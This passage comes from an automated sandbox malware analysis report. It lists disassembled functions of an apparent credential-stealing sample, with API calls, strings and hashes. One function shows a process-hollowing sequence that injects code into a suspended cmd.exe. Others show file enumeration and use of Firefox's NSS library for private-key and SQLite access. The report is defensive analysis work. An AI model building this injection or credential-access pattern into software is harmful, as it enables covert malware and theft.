                                                                                                                                                                                                              • sqlite3_mprintf.NSS3(snippet), ref: 6CAAEF3C
                                                                                                                                                                                                              • sqlite3_mprintf.NSS3(offsets), ref: 6CAAEFE4
                                                                                                                                                                                                                • Part of subcall function 6CB6DFC0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,00000003,?,6CA45001,?,00000003,00000000), ref: 6CB6DFD7
                                                                                                                                                                                                              • sqlite3_mprintf.NSS3(matchinfo), ref: 6CAAF087
                                                                                                                                                                                                              • sqlite3_mprintf.NSS3(matchinfo), ref: 6CAAF129
                                                                                                                                                                                                              • sqlite3_mprintf.NSS3(optimize), ref: 6CAAF1D1
                                                                                                                                                                                                              • sqlite3_free.NSS3(?), ref: 6CAAF368
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3416838227.000000006CA40000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417188068.000000006CBDF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417240038.000000006CC1E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417263683.000000006CC1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417298980.000000006CC20000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417326070.000000006CC25000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_6ca40000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: sqlite3_mprintf$strlen$sqlite3_freesqlite3_initialize
                                                                                                                                                                                                              • String ID: fts3$fts3_tokenizer$fts3tokenize$fts4$fts4aux$matchinfo$offsets$optimize$porter$simple$snippet$unicode61
                                                                                                                                                                                                              • API String ID: 2518200370-449611708
                                                                                                                                                                                                              • Opcode ID: 01debc1c4b6772bd918c2c1c615f6b37b2a8f360c195e8bc1a77f8ee9709d115
                                                                                                                                                                                                              • Instruction ID: 19bb28eecb5b35bf3dfdd36595412cccbca479a45c44984fe022916260f19634
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 01debc1c4b6772bd918c2c1c615f6b37b2a8f360c195e8bc1a77f8ee9709d115
                                                                                                                                                                                                              • Instruction Fuzzy Hash: AE02C3B5B043405FE7089FB29C4572B76B57BC5718F18853CD86987B00EB75E88B8792
                                                                                                                                                                                                              Function 6CB27C00 Relevance: 31.9, APIs: 21, Instructions: 421COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PR_SetError.NSS3(FFFFE005,00000000), ref: 6CB27C33
                                                                                                                                                                                                              • NSS_OptionGet.NSS3(0000000C,00000000), ref: 6CB27C66
                                                                                                                                                                                                              • CERT_DestroyCertificate.NSS3(00000000), ref: 6CB27D1E
                                                                                                                                                                                                                • Part of subcall function 6CB27870: SECOID_FindOID_Util.NSS3(?,?,?,6CB291C5), ref: 6CB2788F
                                                                                                                                                                                                              • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6CB27D48
                                                                                                                                                                                                              • PR_SetError.NSS3(FFFFE067,00000000), ref: 6CB27D71
                                                                                                                                                                                                              • SECKEY_DestroyPublicKey.NSS3(00000000), ref: 6CB27DD3
                                                                                                                                                                                                              • SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6CB27DE1
                                                                                                                                                                                                              • PR_SetError.NSS3(FFFFE005,00000000), ref: 6CB27DF8
                                                                                                                                                                                                              • SECKEY_DestroyPublicKey.NSS3(?), ref: 6CB27E1A
                                                                                                                                                                                                              • PR_SetError.NSS3(FFFFE067,00000000), ref: 6CB27E58
                                                                                                                                                                                                                • Part of subcall function 6CB27870: PR_SetError.NSS3(FFFFE005,00000000,?,?,6CB291C5), ref: 6CB278BB
                                                                                                                                                                                                                • Part of subcall function 6CB27870: PORT_ZAlloc_Util.NSS3(0000000C,?,?,?,6CB291C5), ref: 6CB278FA
                                                                                                                                                                                                                • Part of subcall function 6CB27870: strchr.VCRUNTIME140(?,0000003A,?,?,?,?,?,?,?,?,?,?,6CB291C5), ref: 6CB27930
                                                                                                                                                                                                                • Part of subcall function 6CB27870: PORT_Alloc_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,6CB291C5), ref: 6CB27951
                                                                                                                                                                                                                • Part of subcall function 6CB27870: memcpy.VCRUNTIME140(00000000,?,?), ref: 6CB27964
                                                                                                                                                                                                                • Part of subcall function 6CB27870: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000), ref: 6CB2797A
                                                                                                                                                                                                                • Part of subcall function 6CB27870: strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000001), ref: 6CB27988
                                                                                                                                                                                                                • Part of subcall function 6CB27870: memcpy.VCRUNTIME140(?,00000001,00000001), ref: 6CB27998
                                                                                                                                                                                                                • Part of subcall function 6CB27870: free.MOZGLUE(00000000), ref: 6CB279A7
                                                                                                                                                                                                                • Part of subcall function 6CB27870: SECITEM_ZfreeItem_Util.NSS3(00000000,00000001,?,?,?,?,?,?,?,?,?,?,6CB291C5), ref: 6CB279BB
                                                                                                                                                                                                                • Part of subcall function 6CB27870: PR_GetCurrentThread.NSS3(?,?,?,?,6CB291C5), ref: 6CB279CA
                                                                                                                                                                                                              • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6CB27E49
                                                                                                                                                                                                              • SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6CB27F8C
                                                                                                                                                                                                              • SECKEY_DestroyPublicKey.NSS3(?), ref: 6CB27F98
                                                                                                                                                                                                              • SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6CB27FBF
                                                                                                                                                                                                              • SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6CB27FD9
                                                                                                                                                                                                              • PK11_ImportEncryptedPrivateKeyInfoAndReturnKey.NSS3(?,00000000,?,?,?,00000001,00000001,?,?,00000000,?), ref: 6CB28038
                                                                                                                                                                                                              • SECITEM_ZfreeItem_Util.NSS3(00000000,00000000), ref: 6CB28050
                                                                                                                                                                                                              • PK11_ImportPublicKey.NSS3(?,?,00000001), ref: 6CB28093
                                                                                                                                                                                                              • SECOID_FindOID_Util.NSS3 ref: 6CB27F29
                                                                                                                                                                                                                • Part of subcall function 6CB207B0: PL_HashTableLookupConst.NSS3(?,FFFFFFFF,?,?,6CAC8298,?,?,?,6CABFCE5,?), ref: 6CB207BF
                                                                                                                                                                                                                • Part of subcall function 6CB207B0: PL_HashTableLookup.NSS3(?,?), ref: 6CB207E6
                                                                                                                                                                                                                • Part of subcall function 6CB207B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6CB2081B
                                                                                                                                                                                                                • Part of subcall function 6CB207B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6CB20825
                                                                                                                                                                                                              • SECKEY_DestroyPublicKey.NSS3(00000000), ref: 6CB28072
                                                                                                                                                                                                              • SECOID_FindOID_Util.NSS3 ref: 6CB280F5
                                                                                                                                                                                                                • Part of subcall function 6CB2BC10: SECITEM_CopyItem_Util.NSS3(?,?,?,?,-00000001,?,6CB2800A,00000000,?,00000000,?), ref: 6CB2BC3F
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3416838227.000000006CA40000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417188068.000000006CBDF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417240038.000000006CC1E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417263683.000000006CC1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417298980.000000006CC20000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417326070.000000006CC25000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_6ca40000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Util$Item_$Error$Zfree$DestroyPublic$Find$Alloc_CopyHashImportK11_LookupTablememcpy$AlgorithmCertificateConstCurrentEncryptedInfoOptionPrivateReturnTag_Threadfreestrchrstrcmpstrlen
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2815116071-0
                                                                                                                                                                                                              • Opcode ID: 9a68d7dade3b9018481a957e0da8e773dbc18e47a57b26c07eab0c68acc0d424
                                                                                                                                                                                                              • Instruction ID: 0abc539af63b751ff72221832b17007004e9f02e7522777f2dcd4c9e58166451
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9a68d7dade3b9018481a957e0da8e773dbc18e47a57b26c07eab0c68acc0d424
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 07E18F716083809FD710DF28D840B6BB7E5EF44308F14492DE98EABB51E77AE845CB96
                                                                                                                                                                                                              Function 00935B4D Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 179filestringmemoryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,0098967F,?,?,?), ref: 00935B72
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 00935B79
                                                                                                                                                                                                              • wsprintfA.USER32 ref: 00935B92
                                                                                                                                                                                                              • FindFirstFileA.KERNEL32(?,?), ref: 00935BA9
                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,00956AA0), ref: 00935BCA
                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,00956AA4), ref: 00935BE4
                                                                                                                                                                                                              • CopyFileA.KERNEL32(?,?,00000001), ref: 00935CC8
                                                                                                                                                                                                                • Part of subcall function 0093584D: _memset.LIBCMT ref: 00935885
                                                                                                                                                                                                                • Part of subcall function 0093584D: _memset.LIBCMT ref: 00935896
                                                                                                                                                                                                                • Part of subcall function 0093584D: lstrcatA.KERNEL32(?,00000000,?,?,?,?,?,?), ref: 009358C1
                                                                                                                                                                                                                • Part of subcall function 0093584D: lstrcatA.KERNEL32(?,?,?,?,?,?,?), ref: 009358DF
                                                                                                                                                                                                                • Part of subcall function 0093584D: lstrcatA.KERNEL32(?,?,?,?,?,?,?,?), ref: 009358F3
                                                                                                                                                                                                                • Part of subcall function 0093584D: lstrcatA.KERNEL32(?,?,?,?,?,?,?), ref: 00935906
                                                                                                                                                                                                                • Part of subcall function 0093584D: StrStrA.SHLWAPI(00000000), ref: 009359AA
                                                                                                                                                                                                              • DeleteFileA.KERNEL32(?), ref: 00935CEB
                                                                                                                                                                                                              • wsprintfA.USER32 ref: 00935C0B
                                                                                                                                                                                                                • Part of subcall function 009304BC: lstrcpyA.KERNEL32(00000000,00000000,?,00937207,009566BA,?,?,?,?,0093871B), ref: 009304E2
                                                                                                                                                                                                                • Part of subcall function 00931C1F: GetSystemTime.KERNEL32(?,009566E2,?), ref: 00931C4E
                                                                                                                                                                                                                • Part of subcall function 009305DE: lstrlenA.KERNEL32(?,00000000,?,?,?,?,00937228,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 009305F2
                                                                                                                                                                                                                • Part of subcall function 009305DE: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,00937228,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 0093061A
                                                                                                                                                                                                                • Part of subcall function 009305DE: lstrcatA.KERNEL32(?,00000000,?,?,?,?,00937228,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 00930625
                                                                                                                                                                                                                • Part of subcall function 0093059C: lstrcpyA.KERNEL32(00000000,?,0000000C,00937775,009566D6), ref: 009305CA
                                                                                                                                                                                                                • Part of subcall function 0093059C: lstrcatA.KERNEL32(?,?), ref: 009305D4
                                                                                                                                                                                                                • Part of subcall function 00930562: lstrcpyA.KERNEL32(00000000,?,00000000,00937246,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 00930592
                                                                                                                                                                                                              • FindNextFileA.KERNEL32(?,?), ref: 00935D1A
                                                                                                                                                                                                              • FindClose.KERNEL32(?), ref: 00935D2E
                                                                                                                                                                                                              • lstrcatA.KERNEL32(?), ref: 00935D5C
                                                                                                                                                                                                              • lstrcatA.KERNEL32(?), ref: 00935D6F
                                                                                                                                                                                                              • lstrlenA.KERNEL32(?), ref: 00935D7B
                                                                                                                                                                                                              • lstrlenA.KERNEL32(?), ref: 00935D98
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ABE000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ADD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AFC000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B7D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B90000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_920000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: lstrcat$Filelstrcpy$Findlstrlen$Heap_memsetwsprintf$AllocCloseCopyDeleteFirstNextProcessSystemTime
                                                                                                                                                                                                              • String ID: %s\%s$%s\*
                                                                                                                                                                                                              • API String ID: 2636950706-2848263008
                                                                                                                                                                                                              • Opcode ID: e3ad283241d2a18815c60946cf3e8d6f73a37377c5727c782dd44dfdfa3caf27
                                                                                                                                                                                                              • Instruction ID: 79d04123c1bcd7d871d3c02fbbea128726fc4bfb6b0f8ec98c4e60b4ca67f097
                                                                                                                                                                                                              • Opcode Fuzzy Hash: e3ad283241d2a18815c60946cf3e8d6f73a37377c5727c782dd44dfdfa3caf27
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 817129B19002289BDF21EB60DC4ABC977B8AF89305F0105E5B609A3162EF71AEC5CF55
                                                                                                                                                                                                              Function 6CAB1C30 Relevance: 26.3, APIs: 14, Strings: 1, Instructions: 96memoryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32 ref: 6CAB1C6B
                                                                                                                                                                                                              • OpenProcessToken.ADVAPI32(00000000,00000008,?), ref: 6CAB1C75
                                                                                                                                                                                                              • GetTokenInformation.ADVAPI32(00000400,00000004,?,00000400,?), ref: 6CAB1CA1
                                                                                                                                                                                                              • GetLengthSid.ADVAPI32(?), ref: 6CAB1CA9
                                                                                                                                                                                                              • malloc.MOZGLUE(00000000), ref: 6CAB1CB4
                                                                                                                                                                                                              • CopySid.ADVAPI32(00000000,00000000,?), ref: 6CAB1CCC
                                                                                                                                                                                                              • GetTokenInformation.ADVAPI32(?,00000005(TokenIntegrityLevel),?,00000400,?), ref: 6CAB1CE4
                                                                                                                                                                                                              • GetLengthSid.ADVAPI32(?), ref: 6CAB1CEC
                                                                                                                                                                                                              • malloc.MOZGLUE(00000000), ref: 6CAB1CFD
                                                                                                                                                                                                              • CopySid.ADVAPI32(00000000,00000000,?), ref: 6CAB1D0F
                                                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 6CAB1D17
                                                                                                                                                                                                              • AllocateAndInitializeSid.ADVAPI32 ref: 6CAB1D4D
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 6CAB1D73
                                                                                                                                                                                                              • PR_LogPrint.NSS3(_PR_NT_InitSids: OpenProcessToken() failed. Error: %d,00000000), ref: 6CAB1D7F
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • _PR_NT_InitSids: OpenProcessToken() failed. Error: %d, xrefs: 6CAB1D7A
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3416838227.000000006CA40000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417188068.000000006CBDF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417240038.000000006CC1E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417263683.000000006CC1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417298980.000000006CC20000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417326070.000000006CC25000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_6ca40000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Token$CopyInformationLengthProcessmalloc$AllocateCloseCurrentErrorHandleInitializeLastOpenPrint
                                                                                                                                                                                                              • String ID: _PR_NT_InitSids: OpenProcessToken() failed. Error: %d
                                                                                                                                                                                                              • API String ID: 3748115541-1216436346
                                                                                                                                                                                                              • Opcode ID: c693c1ac9e310893f96361f6ec44b8a19866e08f107ae81fa3a4af4f35ef1d88
                                                                                                                                                                                                              • Instruction ID: 49918543cdddf801248870404153eb46e5ac63adeef2824e47429f4fa311f198
                                                                                                                                                                                                              • Opcode Fuzzy Hash: c693c1ac9e310893f96361f6ec44b8a19866e08f107ae81fa3a4af4f35ef1d88
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 743160B5A00218AFEB11EF65CC49BAA7BF8FF4A344F004075F609A2610E7309AD4CF65
                                                                                                                                                                                                              Function 6CAB3D00 Relevance: 24.9, APIs: 10, Strings: 4, Instructions: 446COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • __aulldiv.LIBCMT ref: 6CAB3DFB
                                                                                                                                                                                                              • __allrem.LIBCMT ref: 6CAB3EEC
                                                                                                                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6CAB3FA3
                                                                                                                                                                                                              • memcpy.VCRUNTIME140(?,?,00000001), ref: 6CAB4047
                                                                                                                                                                                                              • memcpy.VCRUNTIME140(?,?,00000000), ref: 6CAB40DE
                                                                                                                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6CAB415F
                                                                                                                                                                                                              • __allrem.LIBCMT ref: 6CAB416B
                                                                                                                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6CAB4288
                                                                                                                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6CAB42AB
                                                                                                                                                                                                              • __allrem.LIBCMT ref: 6CAB42B7
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3416838227.000000006CA40000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417188068.000000006CBDF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417240038.000000006CC1E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417263683.000000006CC1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417298980.000000006CC20000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417326070.000000006CC25000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_6ca40000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$__allrem$memcpy$__aulldiv
                                                                                                                                                                                                              • String ID: %02d$%03d$%04d$%lld
                                                                                                                                                                                                              • API String ID: 703928654-3678606288
                                                                                                                                                                                                              • Opcode ID: 2795ffec32d492a0ab2c843a67472085ac92025334d8c35861709814761f0f14
                                                                                                                                                                                                              • Instruction ID: 5aa954fb61940a5f191421d78d065a8c34ed51e9965bed8df3c62211d4fd1d8a
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2795ffec32d492a0ab2c843a67472085ac92025334d8c35861709814761f0f14
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 85F1E371A087409FD715CF38C881A6AB7FAAF85344F188A1DF495A7751EB34E885CB42
                                                                                                                                                                                                              Function 0092F51F Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 130threadinjectionmemoryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • _memset.LIBCMT ref: 0092F551
                                                                                                                                                                                                              • CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,009565A7,00000000,00000000,00000001,00000004,00000000,00000000,?,?,00000000,00000000,00000000), ref: 0092F575
                                                                                                                                                                                                              • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 0092F587
                                                                                                                                                                                                              • GetThreadContext.KERNEL32(?,00000000), ref: 0092F599
                                                                                                                                                                                                              • ReadProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 0092F5B7
                                                                                                                                                                                                              • VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040), ref: 0092F5CD
                                                                                                                                                                                                              • ResumeThread.KERNEL32(?), ref: 0092F5DD
                                                                                                                                                                                                              • WriteProcessMemory.KERNEL32(?,00000000,00932DA1,?,00000000), ref: 0092F5FC
                                                                                                                                                                                                              • WriteProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 0092F632
                                                                                                                                                                                                              • WriteProcessMemory.KERNEL32(?,?,D6D9E8F4,00000004,00000000), ref: 0092F659
                                                                                                                                                                                                              • SetThreadContext.KERNEL32(?,00000000), ref: 0092F66B
                                                                                                                                                                                                              • ResumeThread.KERNEL32(?), ref: 0092F674
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ABE000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ADD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AFC000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B7D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B90000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_920000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Process$MemoryThread$Write$AllocContextResumeVirtual$CreateRead_memset
                                                                                                                                                                                                              • String ID: ($C:\Windows\System32\cmd.exe
                                                                                                                                                                                                              • API String ID: 3621800378-4087486346
                                                                                                                                                                                                              • Opcode ID: da090160d39a3b809f2aa24862b1e5df89d085a1c7ff375ebe0b3ba23bca6f00
                                                                                                                                                                                                              • Instruction ID: 82c49a96815d96c10f7158c824f7057b572476c725c6dffd54f6e1617cf9fa1a
                                                                                                                                                                                                              • Opcode Fuzzy Hash: da090160d39a3b809f2aa24862b1e5df89d085a1c7ff375ebe0b3ba23bca6f00
                                                                                                                                                                                                              • Instruction Fuzzy Hash: F5413672A00208AFEB11DFA5DC85FAEBBB9FF48705F104064FA05EA161D771AD40DB25
                                                                                                                                                                                                              Function 6CA61C30 Relevance: 23.2, APIs: 3, Strings: 10, Instructions: 485COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CA61D58
                                                                                                                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6CA61EFD
                                                                                                                                                                                                              • sqlite3_exec.NSS3(00000000,00000000,Function_00007370,?,00000000), ref: 6CA61FB7
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • sqlite_master, xrefs: 6CA61C61
                                                                                                                                                                                                              • unsupported file format, xrefs: 6CA62188
                                                                                                                                                                                                              • another row available, xrefs: 6CA62287
                                                                                                                                                                                                              • abort due to ROLLBACK, xrefs: 6CA62223
                                                                                                                                                                                                              • sqlite_temp_master, xrefs: 6CA61C5C
                                                                                                                                                                                                              • SELECT*FROM"%w".%s ORDER BY rowid, xrefs: 6CA61F83
                                                                                                                                                                                                              • attached databases must use the same text encoding as main database, xrefs: 6CA620CA
                                                                                                                                                                                                              • table, xrefs: 6CA61C8B
                                                                                                                                                                                                              • unknown error, xrefs: 6CA62291
                                                                                                                                                                                                              • no more rows available, xrefs: 6CA62264
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3416838227.000000006CA40000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417188068.000000006CBDF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417240038.000000006CC1E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417263683.000000006CC1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417298980.000000006CC20000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417326070.000000006CC25000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_6ca40000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@_byteswap_ulongsqlite3_exec
                                                                                                                                                                                                              • String ID: SELECT*FROM"%w".%s ORDER BY rowid$abort due to ROLLBACK$another row available$attached databases must use the same text encoding as main database$no more rows available$sqlite_master$sqlite_temp_master$table$unknown error$unsupported file format
                                                                                                                                                                                                              • API String ID: 563213449-2102270813
                                                                                                                                                                                                              • Opcode ID: db117fd9a8e1744ff606624ea3ca5d4f7230eb682fa9f434fb60577b2f1dcfcc
                                                                                                                                                                                                              • Instruction ID: 3aff78e895b59067de9d146d6df886504f5d08225ad1559c98f6d6e7247c3a7b
                                                                                                                                                                                                              • Opcode Fuzzy Hash: db117fd9a8e1744ff606624ea3ca5d4f7230eb682fa9f434fb60577b2f1dcfcc
